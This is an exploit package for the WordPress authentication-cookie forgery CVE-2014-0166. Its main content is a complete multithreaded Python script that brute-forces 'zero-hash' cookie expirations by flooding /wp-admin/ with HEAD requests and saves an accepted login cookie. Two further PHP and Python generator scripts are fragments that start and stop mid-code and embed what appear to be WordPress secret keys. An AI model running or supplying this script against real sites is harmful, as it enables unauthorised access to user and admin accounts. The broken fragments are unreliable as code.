# CVE-2014-0166 WordPress before 3.7.2 and 3.8.x before 3.8.2 僞造Cookie獲得權限漏洞 (authentication-cookie forgery: a forged cookie is accepted as a logged-in user)
==INFO==
WordPress < 3.7.2 and 3.8.x < 3.8.2 authentication-cookie forgery (CVE-2014-0166). The auth cookie is `user|expiration|hmac`; vulnerable versions compared the supplied hmac with the server-computed HMAC using PHP's loose `!=`, so an attacker who cannot compute the HMAC sends hmac `0` and varies `expiration` until the server-side hash happens to be a PHP numeric zero (`0e` followed only by digits) — the "zero hash" the scripts below search for, roughly one candidate in 300 million. The fix was a constant-time byte comparison (`hash_equals()`). cookieForger.py searches online (one HEAD request per candidate); wp_zero_cookie_generator.php and zeroCather.py compute the hash locally from the site's keys and the user's 4-character password-hash fragment, so they only apply when those secrets are already known.
===cookieForger.py===
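#!/usr/bin/env python3
"""Proof-of-concept for CVE-2014-0166: forge a WordPress auth cookie with a zero HMAC.

WordPress < 3.7.2 / 3.8.x < 3.8.2 compared the cookie HMAC with PHP's loose
``!=``.  A cookie of the form ``user|expiration|0`` is therefore accepted
whenever the server-side HMAC of ``user|expiration`` looks like a numeric zero
(``0e`` followed only by digits).  An attacker who cannot compute the HMAC
simply varies ``expiration`` until such a "zero hash" is hit; on average about
300 million candidates are needed, hence the thread pool below.

The script walks ``expiration`` upwards from ``1400000000 + initnum``, sends one
``HEAD /wp-admin/`` per candidate and treats an HTTP 200 (instead of the usual
302 redirect to wp-login.php) as a successful forgery.  Progress is written to
``wp_log`` after every round so a restart can resume via ``initnum``; the
winning cookie is written to ``wp_result``.

Original author: Ettack (http://www.ettack.org/wordpress-cookie-forgery/).
This copy is ported to Python 3 and repaired: the published version was pasted
with typographic quotes (it did not parse), incremented ``errcnt`` from 500
threads without a lock, copied ``expiration`` *after* releasing the lock (two
workers could test the same value), crashed with ``NameError`` when
``testCookie`` raised anything other than the errors it handles, and could
shrink the thread pool to zero or below when a round had more errors than
threads.

Only run this against a site you are authorised to test.
"""
import threading
from hashlib import md5
from os import _exit
from sys import stdout
from time import ctime, gmtime, sleep, time

import requests

# --- configuration ---------------------------------------------------------
initnum = 0        # start offset; set per machine when splitting the search
threadNum = 500    # concurrent HEAD requests per round
errTolerance = 0   # shrink the pool once ErrorRequests/AllRequests exceeds this
url = 'http://test.com'   # target site URL, exactly as stored in wp_options.siteurl
user = 'ettack'           # username whose session is being forged

# --- shared state (guarded by ``lock``) -------------------------------------
lock = threading.Lock()
expiration = 1400000000 + initnum   # last expiration value handed to a worker
cnt = 0 + initnum                   # candidates tried so far (checkpointed to wp_log)
errcnt = 0                          # failed requests in the current round
stime = 0.0                         # wall-clock start, set in main()

# WordPress names the auth cookie "wordpress_" + COOKIEHASH, where COOKIEHASH
# is md5(siteurl); ``url`` must match the configured siteurl byte for byte.
cookie_k = 'wordpress_' + md5(url.encode('utf-8')).hexdigest()


def _count_error():
    """Record one failed request; called from worker threads, hence the lock."""
    global errcnt
    with lock:
        errcnt += 1


def testCookie(url, user, expr):
    """Try the forged cookie ``user|expr|0`` against ``url``/wp-admin/.

    Returns the cookie dict when the server answers 200 (cookie accepted),
    ``False`` on the normal 302 redirect to the login page, and the string
    ``"Err"`` after a connection error or an unexpected status code so the
    caller retries the same candidate.  Errors bump the module-level
    ``errcnt`` so ``main`` can throttle the thread pool.
    """
    cookie = {cookie_k: user + '|' + str(expr) + '|0'}
    try:
        # requests.head() does not follow redirects by default, so the 302
        # that a rejected cookie produces is observable here.
        r = requests.head(url + '/wp-admin/', cookies=cookie)
    except requests.exceptions.ConnectionError:
        _count_error()
        sleep(8)   # back off; the target (or our own connection) is saturated
        return "Err"
    statcode = r.status_code
    if statcode == 200:
        return cookie
    if statcode != 302:
        # Anything other than the login redirect (5xx, a WAF's 403, ...) is
        # treated as transient and retried after a pause.
        _count_error()
        sleep(5)
        return "Err"
    return False


def _report_success(cookie):
    """Print the forged cookie and elapsed time, save it to wp_result and exit."""
    print("\n\nCongratulations!!! Found valid cookie:")
    print(str(cookie))
    dtime = time() - stime
    timestr = gmtime(dtime)
    # gmtime() of a duration: tm_mday starts at 1, so subtract it (wraps after a month).
    print("\nRunning time: %sd %sh %sm %ss" % (
        timestr.tm_mday - 1, timestr.tm_hour, timestr.tm_min, timestr.tm_sec))
    with open("wp_result", "w") as fp:
        fp.write(str(cookie))
    # os._exit rather than sys.exit so the other worker threads die with us.
    _exit(0)


def action():
    """Worker body: claim the next expiration value and test it until a real answer."""
    global expiration, cnt
    with lock:
        # Claim the candidate while still holding the lock; copying after the
        # release (as the original did) let two workers test the same value.
        expiration += 1
        cnt += 1
        expr = expiration
        stdout.write("\r%s" % cnt)
        stdout.flush()
    try:
        # Retry the same candidate until the server gives a definite answer.
        while True:
            result = testCookie(url, user, expr)
            if result != "Err":
                break
    except KeyboardInterrupt:
        print("Interrupted at %s" % expiration)
        _exit(0)
    except Exception as e:
        # Unexpected failure (e.g. a requests exception other than
        # ConnectionError): report it and give up on this candidate only.
        print(e)
        return
    if result:
        _report_success(result)


def main():
    """Run rounds of ``threadNum`` workers until a cookie is found or Ctrl-C."""
    global errcnt, threadNum, stime
    stime = time()
    print("Start at %s" % ctime())
    print("Guessing with %d threads...\n" % threadNum)
    try:
        while True:
            errcnt = 0
            threads = [threading.Thread(target=action) for _ in range(threadNum)]
            for t in threads:
                t.start()
            for t in threads:
                t.join()
            # Throttle: a worker may fail several times per round, so errRate
            # can exceed 1; clamp the pool at one thread instead of going to
            # zero (which would divide by zero on the next round).
            errRate = float(errcnt) / threadNum
            if errRate > errTolerance:
                newThreadNum = max(1, int(threadNum * (1 - 0.5 * errRate)))
                print("\nToo many retries (%d/%d). Automatically decrease to %d threads!"
                      % (errcnt, threadNum + errcnt, newThreadNum))
                threadNum = newThreadNum
            # Checkpoint so a restart can resume by setting initnum.
            with open("wp_log", "w") as fp:
                fp.write(str(cnt))
    except KeyboardInterrupt:
        # Ctrl-C is delivered to the main thread, so handle it here too.
        print("\nInterrupted at %s" % expiration)
        _exit(0)


if __name__ == "__main__":
    main()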
===wp_zero_cookie_generator.php===
user_pass, 8, 4)
$scheme = '';                    // scheme label handed to gen_cookie() below (left empty by the author)

// The search space is split into slices of $unit expiration values; argv[1]
// selects the slice so several workers can run in parallel.
$unit = 100000000;
$init = 0;
if (!empty($argv[1])) {
    $init = $argv[1] * $unit;    // e.g. "2" starts this worker at 200000000
}
$exptime = $init + 1400000000;   // first cookie expiration timestamp to hash
$cnt = $init;                    // candidates tried so far
$max = $init + $unit;            // end of this worker's slice
function gen_cookie($site_url,$user,$exptime,$pass_frag,$scheme) {
$lk = 'E..y-UBzte>Ddu^pF~kFsCPd6zD)%gar?0lBPiki9Kg_M`^
===zeroCather.py===
import re,hmac
from multiprocessing import Process,Value
from sys import stdout
# Search parameters.
pnum: int = 8                   # presumably the number of worker Processes (see the multiprocessing import) — confirm below
exprstart: int = 1400000000     # first expiration value to hash; same base as the other two scripts

# Target identity.  The forged cookie is "<user>|<expiration>|0"; the HMAC it
# must collide with is keyed on the user's 4-character password-hash fragment
# (substr(user_pass, 8, 4) in the PHP generator above).
user: str = 'ettack'
pass_frag: str = 'u5dr'
def gen_cookie(user,exptime,pass_frag):
lk = 'dBr|SFMq6`VaOFKw>r~^Npl(-z &OA(9{(W &(?2h&I}v1!V+Kx.m|uV-:z89L72'
ls = 'a=ec%X>I>#/@z>b);!*Qk*!&zS)@3[wW+o+2@gFz5xK$v&P@kV@I(YkJV4i9